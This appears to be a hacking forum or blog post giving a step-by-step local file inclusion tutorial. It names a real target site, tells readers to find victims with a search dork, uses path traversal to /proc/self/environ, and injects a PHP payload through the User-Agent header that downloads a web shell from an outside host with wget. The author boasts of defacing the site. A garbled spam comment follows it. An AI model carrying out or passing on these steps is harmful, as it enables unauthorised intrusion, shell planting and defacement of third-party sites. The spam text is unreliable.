Hello im Eagle Eye
Today im gonna teach you LFI attack tutorial
Make sure you use firefox
Must have tamper data
And brain :D
::Follow this step::
First you must entering a dork
inurl:.php?page=contact.php
Not all site a vuln for this attack
After that choose any site that you want
After you get your victim url
we must find process work
ok for example
http://www.neolanz.com/index.php?page=contact.php
replace some things infront of page=
its will be like this
(url)index.php?page=( the things that we must put )
the things that we have to put is
with a lot of ../../../../../../../../proc/self/environ
then the url will be like this
(url)index.php?page=../../../../../../../../proc/self/environ
so my victim url will be like
http://www.neolanz.com/index.php?page=../../../../../../../../proc/self/environ
this my site ( u can try this site )
after that ...
the site will show like
DOCUMENT_ROOT
its Mean Vulnerable :D
now open your tamper data to change the user agent from whatever it is to
open tamper data
then click start tamper data
after clicking start tamper data
you must reload your page
then some things will pop out
you click Tamper
copy this code ...
<?system('wget http://www.triview.nl/portals/0/shell.txt -O shell.php');?>
copy and paste at user agent
then click OK!
then stop tamper data!
u will able to see your shell at the end of url :)
http://www.neolanz.com/shell.php
DONE!
my deface site ---> http://www.neolanz.com/
Special Thanks to Mohd Izzat because uploading shell while im make this tuto -_-
THANK YOU!
This "Sequestration and children" article is for parents who are sure that they
ReplyDeletewould get a Sequestration the day they are difficult to beat out.
This is In the main caused by pessimistic feelings that regard the nonpartisanship of the life-sustaining records is
existence provided to the general world through its
Section of Vital Records, Department of Wellness & Genial
Hygienics.
Also visit my homepage Mariah Carey